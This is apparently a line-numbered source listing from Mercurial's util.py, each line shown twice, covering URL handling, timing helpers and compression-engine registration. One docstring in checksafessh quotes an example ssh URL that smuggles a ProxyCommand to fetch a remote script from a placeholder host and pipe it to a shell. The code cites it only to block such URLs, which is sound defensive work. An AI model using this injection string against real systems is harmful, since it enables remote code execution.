2766 s += urlreq.quote(self.host)
2766 s += urlreq.quote(self.host)
2767 else:
2767 else:
2768 s += self.host
2768 s += self.host
2769 if self.port:
2769 if self.port:
2770 s += ':' + urlreq.quote(self.port)
2770 s += ':' + urlreq.quote(self.port)
2771 if self.host:
2771 if self.host:
2772 s += '/'
2772 s += '/'
2773 if self.path:
2773 if self.path:
2774 # TODO: similar to the query string, we should not unescape the
2774 # TODO: similar to the query string, we should not unescape the
2775 # path when we store it, the path might contain '%2f' = '/',
2775 # path when we store it, the path might contain '%2f' = '/',
2776 # which we should *not* escape.
2776 # which we should *not* escape.
2777 s += urlreq.quote(self.path, safe=self._safepchars)
2777 s += urlreq.quote(self.path, safe=self._safepchars)
2778 if self.query:
2778 if self.query:
2779 # we store the query in escaped form.
2779 # we store the query in escaped form.
2780 s += '?' + self.query
2780 s += '?' + self.query
2781 if self.fragment is not None:
2781 if self.fragment is not None:
2782 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2782 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2783 return s
2783 return s
2784
2784
2785 __str__ = encoding.strmethod(__bytes__)
2785 __str__ = encoding.strmethod(__bytes__)
2786
2786
2787 def authinfo(self):
2787 def authinfo(self):
2788 user, passwd = self.user, self.passwd
2788 user, passwd = self.user, self.passwd
2789 try:
2789 try:
2790 self.user, self.passwd = None, None
2790 self.user, self.passwd = None, None
2791 s = bytes(self)
2791 s = bytes(self)
2792 finally:
2792 finally:
2793 self.user, self.passwd = user, passwd
2793 self.user, self.passwd = user, passwd
2794 if not self.user:
2794 if not self.user:
2795 return (s, None)
2795 return (s, None)
2796 # authinfo[1] is passed to urllib2 password manager, and its
2796 # authinfo[1] is passed to urllib2 password manager, and its
2797 # URIs must not contain credentials. The host is passed in the
2797 # URIs must not contain credentials. The host is passed in the
2798 # URIs list because Python < 2.4.3 uses only that to search for
2798 # URIs list because Python < 2.4.3 uses only that to search for
2799 # a password.
2799 # a password.
2800 return (s, (None, (s, self.host),
2800 return (s, (None, (s, self.host),
2801 self.user, self.passwd or ''))
2801 self.user, self.passwd or ''))
2802
2802
2803 def isabs(self):
2803 def isabs(self):
2804 if self.scheme and self.scheme != 'file':
2804 if self.scheme and self.scheme != 'file':
2805 return True # remote URL
2805 return True # remote URL
2806 if hasdriveletter(self.path):
2806 if hasdriveletter(self.path):
2807 return True # absolute for our purposes - can't be joined()
2807 return True # absolute for our purposes - can't be joined()
2808 if self.path.startswith(br'\\'):
2808 if self.path.startswith(br'\\'):
2809 return True # Windows UNC path
2809 return True # Windows UNC path
2810 if self.path.startswith('/'):
2810 if self.path.startswith('/'):
2811 return True # POSIX-style
2811 return True # POSIX-style
2812 return False
2812 return False
2813
2813
2814 def localpath(self):
2814 def localpath(self):
2815 if self.scheme == 'file' or self.scheme == 'bundle':
2815 if self.scheme == 'file' or self.scheme == 'bundle':
2816 path = self.path or '/'
2816 path = self.path or '/'
2817 # For Windows, we need to promote hosts containing drive
2817 # For Windows, we need to promote hosts containing drive
2818 # letters to paths with drive letters.
2818 # letters to paths with drive letters.
2819 if hasdriveletter(self._hostport):
2819 if hasdriveletter(self._hostport):
2820 path = self._hostport + '/' + self.path
2820 path = self._hostport + '/' + self.path
2821 elif (self.host is not None and self.path
2821 elif (self.host is not None and self.path
2822 and not hasdriveletter(path)):
2822 and not hasdriveletter(path)):
2823 path = '/' + path
2823 path = '/' + path
2824 return path
2824 return path
2825 return self._origpath
2825 return self._origpath
2826
2826
2827 def islocal(self):
2827 def islocal(self):
2828 '''whether localpath will return something that posixfile can open'''
2828 '''whether localpath will return something that posixfile can open'''
2829 return (not self.scheme or self.scheme == 'file'
2829 return (not self.scheme or self.scheme == 'file'
2830 or self.scheme == 'bundle')
2830 or self.scheme == 'bundle')
2831
2831
2832 def hasscheme(path):
2832 def hasscheme(path):
2833 return bool(url(path).scheme)
2833 return bool(url(path).scheme)
2834
2834
2835 def hasdriveletter(path):
2835 def hasdriveletter(path):
2836 return path and path[1:2] == ':' and path[0:1].isalpha()
2836 return path and path[1:2] == ':' and path[0:1].isalpha()
2837
2837
2838 def urllocalpath(path):
2838 def urllocalpath(path):
2839 return url(path, parsequery=False, parsefragment=False).localpath()
2839 return url(path, parsequery=False, parsefragment=False).localpath()
2840
2840
2841 def checksafessh(path):
2841 def checksafessh(path):
2842 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2842 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2843
2843
2844 This is a sanity check for ssh urls. ssh will parse the first item as
2844 This is a sanity check for ssh urls. ssh will parse the first item as
2845 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2845 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2846 Let's prevent these potentially exploited urls entirely and warn the
2846 Let's prevent these potentially exploited urls entirely and warn the
2847 user.
2847 user.
2848
2848
2849 Raises an error.Abort when the url is unsafe.
2849 Raises an error.Abort when the url is unsafe.
2850 """
2850 """
2851 path = urlreq.unquote(path)
2851 path = urlreq.unquote(path)
2852 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2852 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2853 raise error.Abort(_('potentially unsafe url: %r') %
2853 raise error.Abort(_('potentially unsafe url: %r') %
2854 (pycompat.bytestr(path),))
2854 (pycompat.bytestr(path),))
2855
2855
2856 def hidepassword(u):
2856 def hidepassword(u):
2857 '''hide user credential in a url string'''
2857 '''hide user credential in a url string'''
2858 u = url(u)
2858 u = url(u)
2859 if u.passwd:
2859 if u.passwd:
2860 u.passwd = '***'
2860 u.passwd = '***'
2861 return bytes(u)
2861 return bytes(u)
2862
2862
2863 def removeauth(u):
2863 def removeauth(u):
2864 '''remove all authentication information from a url string'''
2864 '''remove all authentication information from a url string'''
2865 u = url(u)
2865 u = url(u)
2866 u.user = u.passwd = None
2866 u.user = u.passwd = None
2867 return str(u)
2867 return str(u)
2868
2868
2869 timecount = unitcountfn(
2869 timecount = unitcountfn(
2870 (1, 1e3, _('%.0f s')),
2870 (1, 1e3, _('%.0f s')),
2871 (100, 1, _('%.1f s')),
2871 (100, 1, _('%.1f s')),
2872 (10, 1, _('%.2f s')),
2872 (10, 1, _('%.2f s')),
2873 (1, 1, _('%.3f s')),
2873 (1, 1, _('%.3f s')),
2874 (100, 0.001, _('%.1f ms')),
2874 (100, 0.001, _('%.1f ms')),
2875 (10, 0.001, _('%.2f ms')),
2875 (10, 0.001, _('%.2f ms')),
2876 (1, 0.001, _('%.3f ms')),
2876 (1, 0.001, _('%.3f ms')),
2877 (100, 0.000001, _('%.1f us')),
2877 (100, 0.000001, _('%.1f us')),
2878 (10, 0.000001, _('%.2f us')),
2878 (10, 0.000001, _('%.2f us')),
2879 (1, 0.000001, _('%.3f us')),
2879 (1, 0.000001, _('%.3f us')),
2880 (100, 0.000000001, _('%.1f ns')),
2880 (100, 0.000000001, _('%.1f ns')),
2881 (10, 0.000000001, _('%.2f ns')),
2881 (10, 0.000000001, _('%.2f ns')),
2882 (1, 0.000000001, _('%.3f ns')),
2882 (1, 0.000000001, _('%.3f ns')),
2883 )
2883 )
2884
2884
2885 _timenesting = [0]
2885 _timenesting = [0]
2886
2886
2887 def timed(func):
2887 def timed(func):
2888 '''Report the execution time of a function call to stderr.
2888 '''Report the execution time of a function call to stderr.
2889
2889
2890 During development, use as a decorator when you need to measure
2890 During development, use as a decorator when you need to measure
2891 the cost of a function, e.g. as follows:
2891 the cost of a function, e.g. as follows:
2892
2892
2893 @util.timed
2893 @util.timed
2894 def foo(a, b, c):
2894 def foo(a, b, c):
2895 pass
2895 pass
2896 '''
2896 '''
2897
2897
2898 def wrapper(*args, **kwargs):
2898 def wrapper(*args, **kwargs):
2899 start = timer()
2899 start = timer()
2900 indent = 2
2900 indent = 2
2901 _timenesting[0] += indent
2901 _timenesting[0] += indent
2902 try:
2902 try:
2903 return func(*args, **kwargs)
2903 return func(*args, **kwargs)
2904 finally:
2904 finally:
2905 elapsed = timer() - start
2905 elapsed = timer() - start
2906 _timenesting[0] -= indent
2906 _timenesting[0] -= indent
2907 stderr.write('%s%s: %s\n' %
2907 stderr.write('%s%s: %s\n' %
2908 (' ' * _timenesting[0], func.__name__,
2908 (' ' * _timenesting[0], func.__name__,
2909 timecount(elapsed)))
2909 timecount(elapsed)))
2910 return wrapper
2910 return wrapper
2911
2911
2912 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2912 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2913 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2913 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2914
2914
2915 def sizetoint(s):
2915 def sizetoint(s):
2916 '''Convert a space specifier to a byte count.
2916 '''Convert a space specifier to a byte count.
2917
2917
2918 >>> sizetoint(b'30')
2918 >>> sizetoint(b'30')
2919 30
2919 30
2920 >>> sizetoint(b'2.2kb')
2920 >>> sizetoint(b'2.2kb')
2921 2252
2921 2252
2922 >>> sizetoint(b'6M')
2922 >>> sizetoint(b'6M')
2923 6291456
2923 6291456
2924 '''
2924 '''
2925 t = s.strip().lower()
2925 t = s.strip().lower()
2926 try:
2926 try:
2927 for k, u in _sizeunits:
2927 for k, u in _sizeunits:
2928 if t.endswith(k):
2928 if t.endswith(k):
2929 return int(float(t[:-len(k)]) * u)
2929 return int(float(t[:-len(k)]) * u)
2930 return int(t)
2930 return int(t)
2931 except ValueError:
2931 except ValueError:
2932 raise error.ParseError(_("couldn't parse size: %s") % s)
2932 raise error.ParseError(_("couldn't parse size: %s") % s)
2933
2933
2934 class hooks(object):
2934 class hooks(object):
2935 '''A collection of hook functions that can be used to extend a
2935 '''A collection of hook functions that can be used to extend a
2936 function's behavior. Hooks are called in lexicographic order,
2936 function's behavior. Hooks are called in lexicographic order,
2937 based on the names of their sources.'''
2937 based on the names of their sources.'''
2938
2938
2939 def __init__(self):
2939 def __init__(self):
2940 self._hooks = []
2940 self._hooks = []
2941
2941
2942 def add(self, source, hook):
2942 def add(self, source, hook):
2943 self._hooks.append((source, hook))
2943 self._hooks.append((source, hook))
2944
2944
2945 def __call__(self, *args):
2945 def __call__(self, *args):
2946 self._hooks.sort(key=lambda x: x[0])
2946 self._hooks.sort(key=lambda x: x[0])
2947 results = []
2947 results = []
2948 for source, hook in self._hooks:
2948 for source, hook in self._hooks:
2949 results.append(hook(*args))
2949 results.append(hook(*args))
2950 return results
2950 return results
2951
2951
2952 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2952 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2953 '''Yields lines for a nicely formatted stacktrace.
2953 '''Yields lines for a nicely formatted stacktrace.
2954 Skips the 'skip' last entries, then return the last 'depth' entries.
2954 Skips the 'skip' last entries, then return the last 'depth' entries.
2955 Each file+linenumber is formatted according to fileline.
2955 Each file+linenumber is formatted according to fileline.
2956 Each line is formatted according to line.
2956 Each line is formatted according to line.
2957 If line is None, it yields:
2957 If line is None, it yields:
2958 length of longest filepath+line number,
2958 length of longest filepath+line number,
2959 filepath+linenumber,
2959 filepath+linenumber,
2960 function
2960 function
2961
2961
2962 Not be used in production code but very convenient while developing.
2962 Not be used in production code but very convenient while developing.
2963 '''
2963 '''
2964 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2964 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2965 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2965 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2966 ][-depth:]
2966 ][-depth:]
2967 if entries:
2967 if entries:
2968 fnmax = max(len(entry[0]) for entry in entries)
2968 fnmax = max(len(entry[0]) for entry in entries)
2969 for fnln, func in entries:
2969 for fnln, func in entries:
2970 if line is None:
2970 if line is None:
2971 yield (fnmax, fnln, func)
2971 yield (fnmax, fnln, func)
2972 else:
2972 else:
2973 yield line % (fnmax, fnln, func)
2973 yield line % (fnmax, fnln, func)
2974
2974
2975 def debugstacktrace(msg='stacktrace', skip=0,
2975 def debugstacktrace(msg='stacktrace', skip=0,
2976 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2976 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2977 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2977 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2978 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2978 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2979 By default it will flush stdout first.
2979 By default it will flush stdout first.
2980 It can be used everywhere and intentionally does not require an ui object.
2980 It can be used everywhere and intentionally does not require an ui object.
2981 Not be used in production code but very convenient while developing.
2981 Not be used in production code but very convenient while developing.
2982 '''
2982 '''
2983 if otherf:
2983 if otherf:
2984 otherf.flush()
2984 otherf.flush()
2985 f.write('%s at:\n' % msg.rstrip())
2985 f.write('%s at:\n' % msg.rstrip())
2986 for line in getstackframes(skip + 1, depth=depth):
2986 for line in getstackframes(skip + 1, depth=depth):
2987 f.write(line)
2987 f.write(line)
2988 f.flush()
2988 f.flush()
2989
2989
2990 class dirs(object):
2990 class dirs(object):
2991 '''a multiset of directory names from a dirstate or manifest'''
2991 '''a multiset of directory names from a dirstate or manifest'''
2992
2992
2993 def __init__(self, map, skip=None):
2993 def __init__(self, map, skip=None):
2994 self._dirs = {}
2994 self._dirs = {}
2995 addpath = self.addpath
2995 addpath = self.addpath
2996 if safehasattr(map, 'iteritems') and skip is not None:
2996 if safehasattr(map, 'iteritems') and skip is not None:
2997 for f, s in map.iteritems():
2997 for f, s in map.iteritems():
2998 if s[0] != skip:
2998 if s[0] != skip:
2999 addpath(f)
2999 addpath(f)
3000 else:
3000 else:
3001 for f in map:
3001 for f in map:
3002 addpath(f)
3002 addpath(f)
3003
3003
3004 def addpath(self, path):
3004 def addpath(self, path):
3005 dirs = self._dirs
3005 dirs = self._dirs
3006 for base in finddirs(path):
3006 for base in finddirs(path):
3007 if base in dirs:
3007 if base in dirs:
3008 dirs[base] += 1
3008 dirs[base] += 1
3009 return
3009 return
3010 dirs[base] = 1
3010 dirs[base] = 1
3011
3011
3012 def delpath(self, path):
3012 def delpath(self, path):
3013 dirs = self._dirs
3013 dirs = self._dirs
3014 for base in finddirs(path):
3014 for base in finddirs(path):
3015 if dirs[base] > 1:
3015 if dirs[base] > 1:
3016 dirs[base] -= 1
3016 dirs[base] -= 1
3017 return
3017 return
3018 del dirs[base]
3018 del dirs[base]
3019
3019
3020 def __iter__(self):
3020 def __iter__(self):
3021 return iter(self._dirs)
3021 return iter(self._dirs)
3022
3022
3023 def __contains__(self, d):
3023 def __contains__(self, d):
3024 return d in self._dirs
3024 return d in self._dirs
3025
3025
3026 if safehasattr(parsers, 'dirs'):
3026 if safehasattr(parsers, 'dirs'):
3027 dirs = parsers.dirs
3027 dirs = parsers.dirs
3028
3028
3029 def finddirs(path):
3029 def finddirs(path):
3030 pos = path.rfind('/')
3030 pos = path.rfind('/')
3031 while pos != -1:
3031 while pos != -1:
3032 yield path[:pos]
3032 yield path[:pos]
3033 pos = path.rfind('/', 0, pos)
3033 pos = path.rfind('/', 0, pos)
3034
3034
3035 # compression code
3035 # compression code
3036
3036
3037 SERVERROLE = 'server'
3037 SERVERROLE = 'server'
3038 CLIENTROLE = 'client'
3038 CLIENTROLE = 'client'
3039
3039
3040 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3040 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3041 (u'name', u'serverpriority',
3041 (u'name', u'serverpriority',
3042 u'clientpriority'))
3042 u'clientpriority'))
3043
3043
3044 class compressormanager(object):
3044 class compressormanager(object):
3045 """Holds registrations of various compression engines.
3045 """Holds registrations of various compression engines.
3046
3046
3047 This class essentially abstracts the differences between compression
3047 This class essentially abstracts the differences between compression
3048 engines to allow new compression formats to be added easily, possibly from
3048 engines to allow new compression formats to be added easily, possibly from
3049 extensions.
3049 extensions.
3050
3050
3051 Compressors are registered against the global instance by calling its
3051 Compressors are registered against the global instance by calling its
3052 ``register()`` method.
3052 ``register()`` method.
3053 """
3053 """
3054 def __init__(self):
3054 def __init__(self):
3055 self._engines = {}
3055 self._engines = {}
3056 # Bundle spec human name to engine name.
3056 # Bundle spec human name to engine name.
3057 self._bundlenames = {}
3057 self._bundlenames = {}
3058 # Internal bundle identifier to engine name.
3058 # Internal bundle identifier to engine name.
3059 self._bundletypes = {}
3059 self._bundletypes = {}
3060 # Revlog header to engine name.
3060 # Revlog header to engine name.
3061 self._revlogheaders = {}
3061 self._revlogheaders = {}
3062 # Wire proto identifier to engine name.
3062 # Wire proto identifier to engine name.
3063 self._wiretypes = {}
3063 self._wiretypes = {}
3064
3064
3065 def __getitem__(self, key):
3065 def __getitem__(self, key):
3066 return self._engines[key]
3066 return self._engines[key]
3067
3067
3068 def __contains__(self, key):
3068 def __contains__(self, key):
3069 return key in self._engines
3069 return key in self._engines
3070
3070
3071 def __iter__(self):
3071 def __iter__(self):
3072 return iter(self._engines.keys())
3072 return iter(self._engines.keys())
3073
3073
3074 def register(self, engine):
3074 def register(self, engine):
3075 """Register a compression engine with the manager.
3075 """Register a compression engine with the manager.
3076
3076
3077 The argument must be a ``compressionengine`` instance.
3077 The argument must be a ``compressionengine`` instance.
3078 """
3078 """
3079 if not isinstance(engine, compressionengine):
3079 if not isinstance(engine, compressionengine):
3080 raise ValueError(_('argument must be a compressionengine'))
3080 raise ValueError(_('argument must be a compressionengine'))
3081
3081
3082 name = engine.name()
3082 name = engine.name()
3083
3083
3084 if name in self._engines:
3084 if name in self._engines:
3085 raise error.Abort(_('compression engine %s already registered') %
3085 raise error.Abort(_('compression engine %s already registered') %
3086 name)
3086 name)
3087
3087
3088 bundleinfo = engine.bundletype()
3088 bundleinfo = engine.bundletype()
3089 if bundleinfo:
3089 if bundleinfo:
3090 bundlename, bundletype = bundleinfo
3090 bundlename, bundletype = bundleinfo
3091
3091
3092 if bundlename in self._bundlenames:
3092 if bundlename in self._bundlenames:
3093 raise error.Abort(_('bundle name %s already registered') %
3093 raise error.Abort(_('bundle name %s already registered') %
3094 bundlename)
3094 bundlename)
3095 if bundletype in self._bundletypes:
3095 if bundletype in self._bundletypes:
3096 raise error.Abort(_('bundle type %s already registered by %s') %
3096 raise error.Abort(_('bundle type %s already registered by %s') %
3097 (bundletype, self._bundletypes[bundletype]))
3097 (bundletype, self._bundletypes[bundletype]))
3098
3098
3099 # No external facing name declared.
3099 # No external facing name declared.
3100 if bundlename:
3100 if bundlename:
3101 self._bundlenames[bundlename] = name
3101 self._bundlenames[bundlename] = name
3102
3102
3103 self._bundletypes[bundletype] = name
3103 self._bundletypes[bundletype] = name
3104
3104
3105 wiresupport = engine.wireprotosupport()
3105 wiresupport = engine.wireprotosupport()
3106 if wiresupport:
3106 if wiresupport:
3107 wiretype = wiresupport.name
3107 wiretype = wiresupport.name
3108 if wiretype in self._wiretypes:
3108 if wiretype in self._wiretypes:
3109 raise error.Abort(_('wire protocol compression %s already '
3109 raise error.Abort(_('wire protocol compression %s already '
3110 'registered by %s') %
3110 'registered by %s') %
3111 (wiretype, self._wiretypes[wiretype]))
3111 (wiretype, self._wiretypes[wiretype]))
3112
3112
3113 self._wiretypes[wiretype] = name
3113 self._wiretypes[wiretype] = name
3114
3114
3115 revlogheader = engine.revlogheader()
3115 revlogheader = engine.revlogheader()
3116 if revlogheader and revlogheader in self._revlogheaders:
3116 if revlogheader and revlogheader in self._revlogheaders:
3117 raise error.Abort(_('revlog header %s already registered by %s') %
3117 raise error.Abort(_('revlog header %s already registered by %s') %
3118 (revlogheader, self._revlogheaders[revlogheader]))
3118 (revlogheader, self._revlogheaders[revlogheader]))
3119
3119
3120 if revlogheader:
3120 if revlogheader:
3121 self._revlogheaders[revlogheader] = name
3121 self._revlogheaders[revlogheader] = name
3122
3122
3123 self._engines[name] = engine
3123 self._engines[name] = engine
3124
3124
3125 @property
3125 @property
3126 def supportedbundlenames(self):
3126 def supportedbundlenames(self):
3127 return set(self._bundlenames.keys())
3127 return set(self._bundlenames.keys())
3128
3128
3129 @property
3129 @property
3130 def supportedbundletypes(self):
3130 def supportedbundletypes(self):
3131 return set(self._bundletypes.keys())
3131 return set(self._bundletypes.keys())
3132
3132
3133 def forbundlename(self, bundlename):
3133 def forbundlename(self, bundlename):
3134 """Obtain a compression engine registered to a bundle name.
3134 """Obtain a compression engine registered to a bundle name.
3135
3135
3136 Will raise KeyError if the bundle type isn't registered.
3136 Will raise KeyError if the bundle type isn't registered.
3137
3137
3138 Will abort if the engine is known but not available.
3138 Will abort if the engine is known but not available.
3139 """
3139 """
3140 engine = self._engines[self._bundlenames[bundlename]]
3140 engine = self._engines[self._bundlenames[bundlename]]
3141 if not engine.available():
3141 if not engine.available():
3142 raise error.Abort(_('compression engine %s could not be loaded') %
3142 raise error.Abort(_('compression engine %s could not be loaded') %
3143 engine.name())
3143 engine.name())
3144 return engine
3144 return engine
3145
3145
3146 def forbundletype(self, bundletype):
3146 def forbundletype(self, bundletype):
3147 """Obtain a compression engine registered to a bundle type.
3147 """Obtain a compression engine registered to a bundle type.
3148
3148
3149 Will raise KeyError if the bundle type isn't registered.
3149 Will raise KeyError if the bundle type isn't registered.
3150
3150
3151 Will abort if the engine is known but not available.
3151 Will abort if the engine is known but not available.
3152 """
3152 """
3153 engine = self._engines[self._bundletypes[bundletype]]
3153 engine = self._engines[self._bundletypes[bundletype]]
3154 if not engine.available():
3154 if not engine.available():
3155 raise error.Abort(_('compression engine %s could not be loaded') %
3155 raise error.Abort(_('compression engine %s could not be loaded') %
3156 engine.name())
3156 engine.name())
3157 return engine
3157 return engine
3158
3158
3159 def supportedwireengines(self, role, onlyavailable=True):
3159 def supportedwireengines(self, role, onlyavailable=True):
3160 """Obtain compression engines that support the wire protocol.
3160 """Obtain compression engines that support the wire protocol.
3161
3161
3162 Returns a list of engines in prioritized order, most desired first.
3162 Returns a list of engines in prioritized order, most desired first.
3163
3163
3164 If ``onlyavailable`` is set, filter out engines that can't be
3164 If ``onlyavailable`` is set, filter out engines that can't be
3165 loaded.
3165 loaded.
3166 """
3166 """
3167 assert role in (SERVERROLE, CLIENTROLE)
3167 assert role in (SERVERROLE, CLIENTROLE)
3168
3168
3169 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3169 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3170
3170
3171 engines = [self._engines[e] for e in self._wiretypes.values()]
3171 engines = [self._engines[e] for e in self._wiretypes.values()]
3172 if onlyavailable:
3172 if onlyavailable:
3173 engines = [e for e in engines if e.available()]
3173 engines = [e for e in engines if e.available()]
3174
3174
3175 def getkey(e):
3175 def getkey(e):
3176 # Sort first by priority, highest first. In case of tie, sort
3176 # Sort first by priority, highest first. In case of tie, sort
3177 # alphabetically. This is arbitrary, but ensures output is
3177 # alphabetically. This is arbitrary, but ensures output is
3178 # stable.
3178 # stable.
3179 w = e.wireprotosupport()
3179 w = e.wireprotosupport()
3180 return -1 * getattr(w, attr), w.name
3180 return -1 * getattr(w, attr), w.name
3181
3181
3182 return list(sorted(engines, key=getkey))
3182 return list(sorted(engines, key=getkey))
3183
3183
3184 def forwiretype(self, wiretype):
3184 def forwiretype(self, wiretype):
3185 engine = self._engines[self._wiretypes[wiretype]]
3185 engine = self._engines[self._wiretypes[wiretype]]
3186 if not engine.available():
3186 if not engine.available():
3187 raise error.Abort(_('compression engine %s could not be loaded') %
3187 raise error.Abort(_('compression engine %s could not be loaded') %
3188 engine.name())
3188 engine.name())
3189 return engine
3189 return engine
3190
3190
3191 def forrevlogheader(self, header):
3191 def forrevlogheader(self, header):
3192 """Obtain a compression engine registered to a revlog header.
3192 """Obtain a compression engine registered to a revlog header.
3193
3193
3194 Will raise KeyError if the revlog header value isn't registered.
3194 Will raise KeyError if the revlog header value isn't registered.
3195 """
3195 """
3196 return self._engines[self._revlogheaders[header]]
3196 return self._engines[self._revlogheaders[header]]
3197
3197
3198 compengines = compressormanager()
3198 compengines = compressormanager()
3199
3199
3200 class compressionengine(object):
3200 class compressionengine(object):
3201 """Base class for compression engines.
3201 """Base class for compression engines.
3202
3202
3203 Compression engines must implement the interface defined by this class.
3203 Compression engines must implement the interface defined by this class.
3204 """
3204 """
3205 def name(self):
3205 def name(self):
3206 """Returns the name of the compression engine.
3206 """Returns the name of the compression engine.
3207
3207
3208 This is the key the engine is registered under.
3208 This is the key the engine is registered under.
3209
3209
3210 This method must be implemented.
3210 This method must be implemented.
3211 """
3211 """
3212 raise NotImplementedError()
3212 raise NotImplementedError()
3213
3213
3214 def available(self):
3214 def available(self):
3215 """Whether the compression engine is available.
3215 """Whether the compression engine is available.
3216
3216
3217 The intent of this method is to allow optional compression engines
3217 The intent of this method is to allow optional compression engines
3218 that may not be available in all installations (such as engines relying
3218 that may not be available in all installations (such as engines relying
3219 on C extensions that may not be present).
3219 on C extensions that may not be present).
3220 """
3220 """
3221 return True
3221 return True
3222
3222
3223 def bundletype(self):
3223 def bundletype(self):
3224 """Describes bundle identifiers for this engine.
3224 """Describes bundle identifiers for this engine.
3225
3225
3226 If this compression engine isn't supported for bundles, returns None.
3226 If this compression engine isn't supported for bundles, returns None.
3227
3227
3228 If this engine can be used for bundles, returns a 2-tuple of strings of
3228 If this engine can be used for bundles, returns a 2-tuple of strings of
3229 the user-facing "bundle spec" compression name and an internal
3229 the user-facing "bundle spec" compression name and an internal
3230 identifier used to denote the compression format within bundles. To
3230 identifier used to denote the compression format within bundles. To
3231 exclude the name from external usage, set the first element to ``None``.
3231 exclude the name from external usage, set the first element to ``None``.
3232
3232
3233 If bundle compression is supported, the class must also implement
3233 If bundle compression is supported, the class must also implement
3234 ``compressstream`` and `decompressorreader``.
3234 ``compressstream`` and `decompressorreader``.
3235
3235
3236 The docstring of this method is used in the help system to tell users
3236 The docstring of this method is used in the help system to tell users
3237 about this engine.
3237 about this engine.
3238 """
3238 """
3239 return None
3239 return None
3240
3240
3241 def wireprotosupport(self):
3241 def wireprotosupport(self):
3242 """Declare support for this compression format on the wire protocol.
3242 """Declare support for this compression format on the wire protocol.
3243
3243
3244 If this compression engine isn't supported for compressing wire
3244 If this compression engine isn't supported for compressing wire
3245 protocol payloads, returns None.
3245 protocol payloads, returns None.
3246
3246
3247 Otherwise, returns ``compenginewireprotosupport`` with the following
3247 Otherwise, returns ``compenginewireprotosupport`` with the following
3248 fields:
3248 fields:
3249
3249
3250 * String format identifier
3250 * String format identifier
3251 * Integer priority for the server
3251 * Integer priority for the server
3252 * Integer priority for the client
3252 * Integer priority for the client
3253
3253
3254 The integer priorities are used to order the advertisement of format
3254 The integer priorities are used to order the advertisement of format
3255 support by server and client. The highest integer is advertised
3255 support by server and client. The highest integer is advertised
3256 first. Integers with non-positive values aren't advertised.
3256 first. Integers with non-positive values aren't advertised.
3257
3257
3258 The priority values are somewhat arbitrary and only used for default
3258 The priority values are somewhat arbitrary and only used for default
3259 ordering. The relative order can be changed via config options.
3259 ordering. The relative order can be changed via config options.
3260
3260
3261 If wire protocol compression is supported, the class must also implement
3261 If wire protocol compression is supported, the class must also implement
3262 ``compressstream`` and ``decompressorreader``.
3262 ``compressstream`` and ``decompressorreader``.
3263 """
3263 """
3264 return None
3264 return None
3265
3265
3266 def revlogheader(self):
3266 def revlogheader(self):
3267 """Header added to revlog chunks that identifies this engine.
3267 """Header added to revlog chunks that identifies this engine.
3268
3268
3269 If this engine can be used to compress revlogs, this method should
3269 If this engine can be used to compress revlogs, this method should
3270 return the bytes used to identify chunks compressed with this engine.
3270 return the bytes used to identify chunks compressed with this engine.
3271 Else, the method should return ``None`` to indicate it does not
3271 Else, the method should return ``None`` to indicate it does not
3272 participate in revlog compression.
3272 participate in revlog compression.
3273 """
3273 """
3274 return None
3274 return None
3275
3275
3276 def compressstream(self, it, opts=None):
3276 def compressstream(self, it, opts=None):
3277 """Compress an iterator of chunks.
3277 """Compress an iterator of chunks.
3278
3278
3279 The method receives an iterator (ideally a generator) of chunks of
3279 The method receives an iterator (ideally a generator) of chunks of
3280 bytes to be compressed. It returns an iterator (ideally a generator)
3280 bytes to be compressed. It returns an iterator (ideally a generator)
3281 of bytes of chunks representing the compressed output.
3281 of bytes of chunks representing the compressed output.
3282
3282
3283 Optionally accepts an argument defining how to perform compression.
3283 Optionally accepts an argument defining how to perform compression.
3284 Each engine treats this argument differently.
3284 Each engine treats this argument differently.
3285 """
3285 """
3286 raise NotImplementedError()
3286 raise NotImplementedError()
3287
3287
3288 def decompressorreader(self, fh):
3288 def decompressorreader(self, fh):
3289 """Perform decompression on a file object.
3289 """Perform decompression on a file object.
3290
3290
3291 Argument is an object with a ``read(size)`` method that returns
3291 Argument is an object with a ``read(size)`` method that returns
3292 compressed data. Return value is an object with a ``read(size)`` that
3292 compressed data. Return value is an object with a ``read(size)`` that
3293 returns uncompressed data.
3293 returns uncompressed data.
3294 """
3294 """
3295 raise NotImplementedError()
3295 raise NotImplementedError()
3296
3296
3297 def revlogcompressor(self, opts=None):
3297 def revlogcompressor(self, opts=None):
3298 """Obtain an object that can be used to compress revlog entries.
3298 """Obtain an object that can be used to compress revlog entries.
3299
3299
3300 The object has a ``compress(data)`` method that compresses binary
3300 The object has a ``compress(data)`` method that compresses binary
3301 data. This method returns compressed binary data or ``None`` if
3301 data. This method returns compressed binary data or ``None`` if
3302 the data could not be compressed (too small, not compressible, etc).
3302 the data could not be compressed (too small, not compressible, etc).
3303 The returned data should have a header uniquely identifying this
3303 The returned data should have a header uniquely identifying this
3304 compression format so decompression can be routed to this engine.
